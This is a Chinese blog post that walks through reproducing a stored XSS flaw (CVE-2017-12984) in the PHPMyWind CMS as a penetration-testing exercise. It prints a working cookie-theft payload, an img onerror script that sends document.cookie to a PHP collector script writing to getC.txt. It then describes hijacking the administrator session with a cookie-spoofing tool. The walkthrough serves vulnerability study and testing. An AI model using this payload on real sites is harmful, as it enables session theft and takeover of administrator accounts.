您当前的位置:首页 > 电脑百科 > 安全防护 > 网络安全

存储型XSS的危害

时间:2019-12-19 17:00:22  来源:  作者:

众所周知,我们一般将XSS分为三类,反射型、存储型、DOM型,反射型XSS这个基本可以说是没什么利用价值,因为它是不能留存下来的,你改变数据执行了一个临时的XSS,但这个数据没有存储到服务器、数据库中,不能再次展示给别人看,其他人进入同一页面请求服务器并不受你的脚本影响,DOM型XSS也是一样,它就是通过影响前端的DOM环境来执行一些js脚本,执行的脚本并没有留存下来,所以危害比较大的还是存储型XSS,也叫永久型XSS。

平常在我的渗透测试工作过程中,不管是什么类型的XSS问题,验证存在XSS问题也就js一小段脚本弹一个框,证明存在即可,但实际上,作为一名高级渗透测试人员肯定是要知道对于存储型XSS,针对这种漏洞,如何搭建环境接受跨站攻击获取的数据和利用的一整套流程。另外再补充下,只要是能让你输入的地方,留言、评论甚至URL上的参数等,你都可以试一下,还有验证XSS时候,不要只会一个<script>去alert,用<img>报错执行、<a>超链接执行JAVAscript伪协议都可以,实际上将<、>这种特殊符号及编码过滤就已经能解决XSS很多问题了。

这次来复现的漏洞是存储型XSS,它的CVE编号是CVE-2017-12984,它是一套基于php环境的CMS系统——PHPMwWind,漏洞版本号<=5.4,所以这里的系统我还是放在phpstudy这套集成环境里,漏洞位置位于用户留言功能里。

安装不说了,看下这个漏洞存在的位置在于message.php虽然对于用户的留言进行了实体编码过滤,这使得js脚本仅对于当前页面无法执行content的脚本内容,但是它任然被正常插入存到数据库中。

 

存储型XSS的危害

 

 

但真正的使这个脚本产生影响的就是位于/admin/message_update.php后台管理页面,未将content内容做任何处理,就直接取出来显示,造成的跨站脚本攻击。

 

存储型XSS的危害

 

 

首先漏洞验证,这个我不贴图了,payload就<img src=0 onerror = alert(/xss/);>就行了;输入的是在用户留言页面,产生的XSS是在管理员的留言功能管理页,点击修改即可触发。

再次,我们插入攻击脚本攻击获取的数据怎么接收,你得需要写个简单的test.php脚本去接收数据,你可以自己去搞一套云服务器环境,这里我为了方便,就和本地环境放一起了,这里用的是php脚本,肯定需要在php的环境下接收,脚本内容如下:

 

存储型XSS的危害

 

 

这很清楚了,通俗易懂,接收到获取的参数c的值,然后把它写到getC.txt中,就是这么简单,再在同一目录下建个getC.txt等着收数据就行了,先测试检查下是否可行,URL加个参数值cc,打开getC.txt查看没问题。

 

存储型XSS的危害

 

 

存储型XSS的危害

 

 

好了,现在构造我们的攻击脚本,这里我是利用报错执行方法,添加一个img字节点,设置它的属性,图片来源为我们接受数据脚本的地址,而取得的cookie却是查看这段代码用户的cookie:

<img src = x onerror

=document.body.AppendChild(document.createElement('img')).setAttribute('src','http://localhost/test.php?c='+document.cookie);>

 

存储型XSS的危害

 

 

登录后台管理员,进入留言管理模块,点击留言修改按钮,触发XSS,这里为什么两个图片标记,第一个使我们插入的<img>图片标签,第二个是我们的onerror执行的脚本内容,添加子元素节点标签<img>,因为跨站脚本(XSS)能够执行,所以我们这个子元素<img>标签能添加,可以看到第二个标签src来源是我的cookie接受的脚本,我的参数c已经获取到了我要的cookie,为什么能够传过去,因为网页要加载这个<img>图片,它需要向它的源服务器进行GET请求,所以就会将我获得的cookie以GET参数传过去。

 

存储型XSS的危害

 

 

现在检查一下我获取的数据小文本getC.txt有没有得到,果然:

 

存储型XSS的危害

 

 

会话凭证cookie已得到,剩下的就简单了,老兵cookie欺骗工具,放入我们拿到手的cookie,成功进入管理员后台,这就是恶意攻击者利用跨站脚本窃取会话凭证的大致流程,也证明了它的危害。

 

存储型XSS的危害

 



Tags:XSS   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  Tags: XSS  点击:(20)  评论:(0)  加入收藏
一.XSSI漏洞原理同源策略同源策略是Web应用程序安全模型中最基本也是最核心的策略。现在所有支持JavaScript的浏览器都会使用这个策略。所谓同源是指,域名,协议,端口相同。同源...【详细内容】
2021-07-14  Tags: XSS  点击:(84)  评论:(0)  加入收藏
一、CSRFCSRF 全称叫做,跨站请求伪造(Cross&mdash;Site Request Forgery),顾名思义,攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成...【详细内容】
2021-06-10  Tags: XSS  点击:(125)  评论:(0)  加入收藏
什么是XSS跨站攻击CSS(Cross Site Script),又叫XSS跨站脚本攻击。它指的是恶意攻击者往Web页面的HTML代码中插入恶意的ActiveX、HTML、JavaScript、Flash或VBScript脚本,当用户...【详细内容】
2021-01-22  Tags: XSS  点击:(133)  评论:(0)  加入收藏
概述XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人...【详细内容】
2020-10-13  Tags: XSS  点击:(174)  评论:(0)  加入收藏
作者:陈吉转发链接:https://mp.weixin.qq.com/s/HweEFh78WXLawyQr_Vsl5g前言前端一般会面临 XSS 这样的安全风险,但随着 React 等现代前端框架的流行,使我们在平时开发时不用太...【详细内容】
2020-09-24  Tags: XSS  点击:(153)  评论:(0)  加入收藏
不知道各位有没有被各类XSS攻击、点击劫持 (ClickJacking、 frame 恶意引用等等方式骚扰过,百度联盟被封就有这些攻击的功劳在里面。为此一直都在搜寻相关防御办法,...【详细内容】
2020-09-21  Tags: XSS  点击:(145)  评论:(0)  加入收藏
一、一般可利用的编码1.URL编码格式:%十六进制数 记住常用符号、字母的 ASCII 码,能熟练转换 10 -16 进制即可。中文的URL编码略有不同,因为用的地方没有,也就不想写了如何利用:...【详细内容】
2020-08-12  Tags: XSS  点击:(116)  评论:(0)  加入收藏
不知道各位有没有被各类XSS攻击、点击劫持 (ClickJacking、 frame 恶意引用等等方式骚扰过,百度联盟被封就有这些攻击的功劳在里面。为此一直都在搜寻相关防御办法,...【详细内容】
2020-08-10  Tags: XSS  点击:(80)  评论:(0)  加入收藏
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、窃取密码、传播恶意代码等攻击。XSS攻击使用到的技术主要为HTML和Javascript...【详细内容】
2020-07-28  Tags: XSS  点击:(275)  评论:(0)  加入收藏
▌简易百科推荐
(报告出品方:德勤)数字化转型网络安全及转型挑战在任何行业,保持竞争力都需要快速开发新产品和 服务并推向市场。创新型业务模式不仅仅是简单地将现有 流程数字化,其正在覆盖供应...【详细内容】
2021-12-22  认是    Tags:网络安全   点击:(29)  评论:(0)  加入收藏
10月18号, W3C中网络平台孵化器小组(Web Platform Incubator Community Group)公布了HTML Sanitizer API的规范草案。这份草案用来解决浏览器如何解决XSS攻击问题。 网络安全中...【详细内容】
2021-12-07  实战Java  博客园  Tags:脚本攻击   点击:(20)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-12-01  Kali与编程    Tags:防火墙   点击:(30)  评论:(0)  加入收藏
网络安全服务商Randori公司日前发布了一份调查报告,列出了网络攻击者最有可能攻击或利用的IT资产。在遭遇Solarwinds黑客攻击一周年之际,以及在网络安全(尤其是勒索软件和供应...【详细内容】
2021-10-28  企业网D1net   企鹅号  Tags:网络攻击   点击:(57)  评论:(0)  加入收藏
0x01.背景实验利用Dns Administrators 组成员,通过远程配置Dns服务,进行Dll inject从而实现特权提升。 在域内,Dns server 通常为Dc Server,Dns服务器管理基于rpc,通过调用c:\wi...【详细内容】
2021-10-22  IT影子    Tags:特权提升   点击:(37)  评论:(0)  加入收藏
本文主要介绍和总结了CSRF跨站请求伪造的基本原理和主要防范措施,工作中有用到的朋友不妨收藏转发一下,以备您参考。什么是CSRF?CSRF跨站点请求伪造(Cross&mdash;Site Request...【详细内容】
2021-10-13  快乐中恒    Tags:CSRF   点击:(49)  评论:(0)  加入收藏
waf拦截在打某市 Hvv 第一天就找到一个文件上传的点,经过测试,可以直接任意文件上传,没有什么道理。 直接尝试上传 Php 文件,被 waf 拦截了 2021最新整理网络安全/渗透测试/安...【详细内容】
2021-10-11  KaliMa    Tags:防火墙   点击:(56)  评论:(0)  加入收藏
应用程序与文件系统的交互始终是高度安全敏感的,因为较小的功能漏洞很容易成为可利用漏洞的来源。这种观察在web文件管理器的情况下尤其正确,其作用是复制完整文件系统的功能...【详细内容】
2021-09-17  IT野涵    Tags:漏洞链   点击:(56)  评论:(0)  加入收藏
您的苹果手机尽管iPhone比Android更安全,但也可以通过各种方式入侵。避免黑客入侵的最佳方法是警惕奇怪的链接或粗略的应用程序,并仅在必要时提供信息。电池寿命差和性能低下...【详细内容】
2021-09-16  Hackers爱好者    Tags:黑客入侵   点击:(633)  评论:(0)  加入收藏
防火墙一般布置在逻辑区域的入口处,位于三层网络架构的核心和汇聚之间,起到隔离逻辑区域,为逻辑区域创建安全策略的作用。 上面就是应用区的防火墙布置方式,他布置在应用区,可以...【详细内容】
2021-09-03  知来知去    Tags:主备模式防火墙   点击:(109)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条